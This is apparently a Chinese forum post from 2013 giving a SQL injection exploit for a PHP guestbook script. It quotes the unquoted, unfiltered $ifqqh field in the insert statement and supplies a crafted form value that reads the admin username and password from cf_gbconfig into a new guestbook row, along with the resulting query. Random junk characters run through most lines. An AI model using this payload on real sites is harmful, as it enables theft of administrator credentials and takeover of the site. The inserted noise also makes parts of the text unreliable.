留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。- D- R [' t5 m1 Y- Y: a* s7 ]! L% `
) r) w0 {% G) n% Z
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。' Z- C/ C! a6 ]8 C
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
9 V! l& u: h' | c$ M# Y6 u0 L# T! i! c3 p$ U Y0 g
提交的时候把ifqqh的值改一下。变成
* N* d m: E7 m* O% K0 a
% \+ ~; x2 V7 T, W5 d/ ?2 C! x/ t<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />: {) B; j7 O, r- `
$ K: ] ]3 p$ K0 b6 L. ]# C4 m- k! d6 p这样SQL插入语句就变了.2 k x6 R4 O, x4 w( @- e2 I% q
6 s( N' x, N0 Kinsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)+ u/ @, D+ ?6 `
. e* n8 _. \: i- K) g构造了另外一句SQL。并且把帐号密码读出来。
4 {! x+ ^9 e- Z& ~4 Q. P, \" w( z/ U% E+ Z5 h+ P( ?+ q
|
发表于 2013-2-19 08:10:11
收藏
支持
反对